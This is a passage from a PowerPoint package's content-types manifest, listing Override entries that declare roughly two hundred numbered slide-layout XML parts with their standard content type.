  <Override PartName="/ppt/slideLayouts/slideLayout2120.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2121.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2122.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2123.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2124.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2125.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2126.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2127.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2128.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2129.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout213.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2130.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2131.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2132.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2133.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2134.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2135.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2136.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2137.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2138.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2139.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout214.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2140.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2141.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2142.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2143.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2144.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2145.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2146.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2147.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2148.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2149.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout215.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2150.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2151.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2152.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2153.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2154.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2155.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2156.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2157.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2158.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2159.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout216.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2160.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2161.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2162.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2163.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2164.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2165.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2166.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2167.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2168.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2169.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout217.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2170.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2171.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2172.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2173.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2174.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2175.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2176.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2177.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2178.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2179.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout218.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2180.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2181.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2182.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2183.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2184.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2185.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2186.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2187.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2188.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2189.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout219.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2190.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2191.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2192.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2193.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2194.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2195.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2196.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2197.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2198.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2199.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout22.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout220.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2200.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2201.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2202.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2203.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2204.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2205.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2206.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2207.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2208.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2209.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout221.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2210.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2211.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2212.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2213.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2214.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2215.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2216.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2217.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2218.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2219.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout222.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2220.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2221.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2222.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2223.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2224.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2225.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2226.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2227.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2228.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2229.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout223.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2230.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2231.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2232.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2233.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2234.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2235.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2236.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2237.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2238.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2239.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout224.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2240.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2241.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2242.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2243.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2244.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2245.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2246.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2247.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2248.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2249.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout225.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2250.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2251.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2252.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2253.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2254.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2255.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2256.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2257.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2258.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2259.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout226.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2260.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2261.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2262.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2263.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2264.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2265.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2266.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2267.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2268.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2269.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout227.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2270.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2271.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2272.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2273.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2274.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2275.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2276.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2277.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2278.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2279.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout228.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2280.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2281.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2282.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2283.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2284.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2285.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2286.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2287.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2288.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2289.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout229.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2290.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2291.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2292.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2293.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2294.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2295.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2296.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2297.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2298.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2299.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout23.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout230.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2300.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2301.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2302.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2303.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2304.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2305.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2306.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2307.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2308.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2309.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout231.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
